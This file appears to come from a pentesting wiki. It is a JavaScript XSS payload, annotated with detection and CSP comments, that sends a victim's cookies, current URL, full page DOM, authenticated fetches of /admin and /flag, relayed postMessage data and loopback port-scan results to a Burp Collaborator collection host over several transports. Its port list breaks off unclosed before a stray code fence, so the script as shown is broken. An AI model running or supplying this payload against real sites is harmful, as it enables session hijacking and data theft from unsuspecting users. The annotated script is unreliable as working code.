hacktricks/pentesting-web/xss-cross-site-scripting/steal-info-js.md
2023-08-03 19:12:22 +00:00

```javascript
// SELECT HERE THE EXFILTRATION MODE (more than 1 can be selected)
// If any GET method is selected (like location or RQ_GET), it's recommended to exfiltrate each info 1 by 1
// Attacker-controlled collection endpoint. Every exfil_by_* function below prefixes its URL with
// this value, so outbound requests from the application's origin to this (or any unexpected)
// host are the main network-level signal a defender can alert on.
var ATTACKER_SERVER = "https://weecosb5a2k7jc0cwlyksg9qzh57tw.burpcollaborator.net"
// One flag per transport used by exfil_info(); several may be true at the same time.
// CSP note: connect-src governs XHR, fetch and sendBeacon, img-src governs the Image transport;
// the document.location transport is not covered by either directive.
var EXFIL_BY_IMG = false        // <img src> GET, value in the query string
var EXFIL_BY_RQ_GET = false     // XMLHttpRequest GET, value in the query string
var EXFIL_BY_RQ_POST = true     // XMLHttpRequest POST, value in the request body
var EXFIL_BY_FETCH_GET = false  // fetch() GET with mode 'no-cors'
var EXFIL_BY_FETCH_POST = false // fetch() POST with mode 'no-cors'
var EXFIL_BY_NAV = false        // navigator.sendBeacon() POST
var EXFIL_BY_LOC = false        // single document.location redirect carrying everything at the end
// Buffer of "name=value" pairs accumulated by exfil_info() while EXFIL_BY_LOC is set;
// flushed by exfil_by_loc(). In a classic (non-module) script these `var`s become window
// properties and are silently overwritten if the snippet is injected twice.
var ALL_INFO = "" // Only used by Location exfiltration
// Function to make the data possible to transmit via either GET or POST
// Base64-encodes `text`, then percent-encodes the result so it can sit in a URL query string
// (the GET-style transports) as well as in a request body (the POST-style ones).
// `btoa` only accepts Latin-1 input: any code point above U+00FF makes it throw.
function encode(text){
  const base64 = btoa(text);
  return encodeURI(base64);
}
// Functions to exfiltrate the information
// Dispatcher: sends one labelled value over every transport whose EXFIL_BY_* flag is true.
// info_name: label used as the URL path segment / query key; text: the (already encoded) value;
// is_final: only meaningful with EXFIL_BY_LOC — true triggers the single redirect that carries ALL_INFO.
// Detection note: the path segments "/exfil_by_<transport>/<info_name>" are fixed strings, so
// these requests are straightforward to match in proxy, WAF or egress logs.
function exfil_info(info_name, text, is_final=false){
if (EXFIL_BY_IMG) exfil_by_img(info_name, text);
if (EXFIL_BY_RQ_GET) exfil_by_rq_get(info_name, text);
if (EXFIL_BY_RQ_POST) exfil_by_rq_post(info_name, text);
if (EXFIL_BY_FETCH_GET) exfil_by_fetch_get(info_name, text);
if (EXFIL_BY_FETCH_POST) exfil_by_fetch_post(info_name, text);
if (EXFIL_BY_NAV) exfil_by_nav(info_name, text);
if (EXFIL_BY_LOC){
// Location mode batches: non-final calls only append to ALL_INFO, the final call navigates
// the whole page (see exfil_by_loc), which the user can see happen.
if (is_final) exfil_by_loc(info_name, text);
else ALL_INFO += "\n\n" + info_name + "=" + text;
}
}
// Image transport: assigning src makes the browser issue a GET for that URL. The value travels
// in the query string, so it lands in the collector's access log and in any intermediate proxy
// log as well. Blocked by a CSP img-src that does not allow ATTACKER_SERVER.
function exfil_by_img(info_name, text){
new Image().src = ATTACKER_SERVER + "/exfil_by_img/" + info_name + "?" + info_name + "=" + text
}
// XHR GET transport: the request is cross-origin, so without CORS headers the response is
// unreadable here — but the request itself (and the value in its query string) still goes out.
// No load/error handlers are attached; nothing is retried. Governed by CSP connect-src.
function exfil_by_rq_get(info_name, text){
var xhttp = new XMLHttpRequest();
xhttp.open("GET", ATTACKER_SERVER + "/exfil_by_rq_get/" + info_name + "?" + info_name + "=" + text, true);
xhttp.send();
}
// XHR POST transport: the value is the raw request body, so it does not appear in URL-based
// logs — body inspection (proxy/WAF) is needed to see it. No Content-Type is set explicitly;
// for a string body browsers typically default to text/plain. Governed by CSP connect-src.
function exfil_by_rq_post(info_name, text){
var xhttp = new XMLHttpRequest();
xhttp.open("POST", ATTACKER_SERVER + "/exfil_by_rq_post/" + info_name, true);
xhttp.send(text);
}
// fetch GET transport with mode 'no-cors': the request is sent even when the collector returns
// no CORS headers; the response is opaque. The promise is not awaited and has no .catch(), so a
// network failure surfaces only as an unhandled rejection in the console. Governed by connect-src.
function exfil_by_fetch_get(info_name, text){
fetch(ATTACKER_SERVER + "/exfil_by_fetch_get/" + info_name + "?" + info_name + "=" + text, {method: 'GET', mode: 'no-cors'});
}
// fetch POST transport with mode 'no-cors' and the value as a string body: this is a "simple"
// request, so no CORS preflight is issued and the body reaches the collector regardless of its
// CORS policy. Same unhandled-rejection caveat as exfil_by_fetch_get. Governed by connect-src.
function exfil_by_fetch_post(info_name, text){
fetch(ATTACKER_SERVER + "/exfil_by_fetch_post/" + info_name, {method: 'POST', mode: 'no-cors', body: text});
}
// sendBeacon transport: a POST that the browser queues and delivers asynchronously, including
// while the page is unloading, which makes it robust against the user navigating away.
// Governed by CSP connect-src. The boolean return value (queued or not) is ignored here.
function exfil_by_nav(info_name, text){
navigator.sendBeacon(ATTACKER_SERVER + "/exfil_by_nav/" + info_name, text)
}
// Location transport: navigates the whole page to the collector with the entire ALL_INFO buffer
// in the ?a= parameter. The info_name/text parameters are accepted but unused. This is the most
// conspicuous transport — the user sees the redirect, and the data is recorded in browser history
// and server logs as part of the URL (and is bounded by URL length limits).
function exfil_by_loc(info_name, text){
document.location = ATTACKER_SERVER + "/exfil_by_loc/?a=" + encode(ALL_INFO);
}
// Functions to get the data to exfiltrate
// Fetches `url` (called below with same-origin relative paths, so the victim's cookies are
// attached automatically) and forwards the response body through exfil_info(url, ...).
// Only readyState is checked, never xhr.status, so error pages (e.g. a 404 body) are sent too.
// HttpOnly does not help against this step: it is the page body, not the cookie, that is read.
function exfil_page_content(url){
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
// Whole body is base64 + URL-encoded before transport, whatever the status code was.
exfil_info(url, encode(xhr.responseText));
}
}
xhr.open('GET', url, true);
xhr.send(null);
}
// Probes one port on the victim's loopback interface from inside their browser. With mode
// "no-cors" the promise resolves with an opaque response whenever a connection is established,
// so resolution alone is treated as "port open" and reported. A rejected fetch (closed port or
// other network error) has no .catch() and shows up only as an unhandled promise rejection.
// Browser Private Network Access restrictions may block page-initiated loopback requests in
// some configurations — behaviour varies by browser; verify before relying on either outcome.
function exfil_internal_port(port){
fetch("http://127.0.0.1:" + port + "/", { mode: "no-cors" }).then(() => {
exfil_info("internal_port", encode(port));
});
}
// Info to exfiltrate
// Everything below runs immediately when the snippet executes in the victim's page.
exfil_info("cookies", encode(document.cookie)); // only cookies without the HttpOnly flag are readable here — that flag is the mitigation for this line
exfil_info("current_url", encode(document.URL)); // full URL including the query string
exfil_info("current_content", encode(document.documentElement.innerHTML)); // the entire rendered DOM, so anything rendered into the page is exposed
// Same-origin fetches issued with the victim's session; server-side, a burst of these paths
// from one session right after a page load is a useful detection pattern.
exfil_page_content("/");
exfil_page_content("/admin"); // Sent regardless of HTTP status: exfil_page_content checks only readyState, so a 404 body is exfiltrated too (the original comment claimed otherwise)
exfil_page_content("/flag");
exfil_page_content("/flag.txt");
top_1000 = [1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43,49,53,70,79,80,81,82,83,84,85,88,89,90,99,100,106,109,110,111,113,119,125,135,139,143,144,146,161,163,179,199,211,212,222,254,255,256,259,264,280,301,306,311,340,366,389,406,407,416,417,425,427,443,444,445,458,464,465,481,497,500,512,513,514,515,524,541,543,544,545,548,554,555,563,587,593,616,617,625,631,636,646,648,666,667,668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800,801,808,843,873,880,888,898,900,901,902,903,911,912,981,987,990,992,993,995,999,1000,1001,1002,1007,1009,1010,1011,1021,1022,1023,1024,1025,1026,1027,1028,1029,1030,1031,1032,1033,1034,1035,1036,1037,1038,1039,1040,1041,1042,1043,1044,1045,1046,1047,1048,1049,1050,1051,1052,1053,1054,1055,1056,1057,1058,1059,1060,1061,1062,1063,1064,1065,1066,1067,1068,1069,1070,1071,1072,1073,1074,1075,1076,1077,1078,1079,1080,1081,1082,1083,1084,1085,1086,1087,1088,1089,1090,1091,1092,1093,1094,1095,1096,1097,1098,1099,1100,1102,1104,1105,1106,1107,1108,1110,1111,1112,1113,1114,1117,1119,1121,1122,1123,1124,1126,1130,1131,1132,1137,1138,1141,1145,1147,1148,1149,1151,1152,1154,1163,1164,1165,1166,1169,1174,1175,1183,1185,1186,1187,1192,1198,1199,1201,1213,1216,1217,1218,1233,1234,1236,1244,1247,1248,1259,1271,1272,1277,1287,1296,1300,1301,1309,1310,1311,1322,1328,1334,1352,1417,1433,1434,1443,1455,1461,1494,1500,1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687,1688,1700,1717,1718,1719,1720,1721,1723,1755,1761,1782,1783,1801,1805,1812,1839,1840,1862,1863,1864,1875,1900,1914,1935,1947,1971,1972,1974,1984,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,2013,2020,2021,2022,2030,2033,2034,2035,2038,2040,2041,2042,2043,2045,2046,2047,2048,2049,2065,2068,2099,2100,2103,2105,2106,2107,2111,2119,2121,2126,2135,2144,2160,2161,2170,2179,2190,2191
```javascript
// Issues one loopback probe per entry of top_1000 with no throttling — as many concurrent
// fetches as the list has entries, which is itself a noticeable burst in the browser's network log.
top_1000.forEach(port => exfil_internal_port(port));
if (EXFIL_BY_LOC){
// Note: exfil_info(...) is invoked right here and its return value (undefined) is what
// setTimeout receives, so the location redirect happens immediately — before the asynchronous
// page-content and port requests above have completed — rather than after 5 s.
setTimeout(exfil_info("完成", "完成", true), 5000) // exfiltrate via location after 5 seconds
}
// Sniff information
// Forwards every postMessage the page receives. e.origin is never checked, so messages from
// any origin are relayed; the value is whatever e.data holds, passed through encode().
window.onmessage = function(e){
exfil_info("onmessage", encode(e.data))
}
```